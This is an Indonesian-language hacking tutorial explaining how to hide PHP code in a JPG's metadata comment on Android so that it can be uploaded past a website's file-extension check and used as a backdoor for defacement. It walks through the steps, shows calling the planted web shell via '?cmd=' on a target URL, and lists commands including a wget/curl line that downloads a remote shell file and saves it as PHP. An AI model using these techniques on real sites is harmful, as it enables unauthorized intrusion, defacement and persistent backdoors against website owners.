cara inject php ke jpg di android
Pasti sebangian dari ente pasti pernah mengpload sebuah file / shell pada website target deface dengan tujuan membuat backdoor pada website tersebut,akan tetapi gagal karena extensi file nya berbeda wkwkwkw :v.Biasanya untuk mengatasi hal yang seperti ini bisa menggunakan teknik tamper data atau http live header,tetapi tidak banyak website bisa menggunakan cara ini juga apa lagi melalui android.
Oke disini ane share bagaimana cara lain untuk bypass extensi file nya agar ke upload pada website target ente :v,tetapi ane juga kgk menjamin 100% berhasil juga.Lanjut untuk cara inject php ke file jpg nya.Oh iya sebelum itu ente harus menginstal aplikasi wajibnya dulu yaitu FAST PHOTO TAGGER di android ente dan juga file jpg (gambar terserah yang penting extensinya jpg/jpeg bukan png).
1.Buka aplikasi fast photo taggernya,pilih menu setting terlebih dahulu untuk mengatur metadatanya.
2.Pilih pada bagian menu metadata tags.
3.Centang pada bagian Comment.setelah itu kembali lagi pada menu utama aplikasinya.
4.kemudian pilih gambar yang ingin ente inject dengan file php dengan cara tekan tahan pada gambar yang ingin ente inject.
5.Setelah itu akan muncul menu metadata ,dan pilih menu Use Fast Tagger.
6.Pada bagian comment masukan kode php nya.untuk menyimpan hasilnya tekan tombol/back kembali pada android ente.
7.Jika sudah pilih menu app kemudian rename filenya.
8.rename filenya dengan extensi php agar bisa dijalankan.
Jika sudah selesai untuk mengetest filenya ente bisa mengunakan sever local host ente masing masing atau bisa juga menggunakan notepad++ di android untuk melihat isi filenya sudah tertanem pada file gambarnya atau belum.Cara pemanggilan /perintahnya yaitu cukup menamnbahkan ?cmd= pada akhir .
contohnya : https://www.target.co.li/[path]/[path]/namafile.php?cmd=
Beberapa perintah yang sering digunakan yaitu:
?cmd=ls ===>untuk melihat list file di dalam direktorinya
?cmd=ls -al ===>untuk melihat file dan permision(izin) filenya
?cmd=wget www.website.co.li/shell.txt -o shell.php ===>untuk mengambil sebuah materi dari sebuah website fungsi -o yaitu menggubah file extensi dari txt menjadi php,atau juga bisa menggunakan curl sebagai ganti wget .keduanya fungsinya sama saja ,kalau ane sering menngunakan curl.
Selanjutnya apa?.kalo udah gitu mau ngapain kalo tidak dipraktekin :v.Ok mamank sekian dulu tutor dari ane semoga bermanfaat bagi kalian semua.
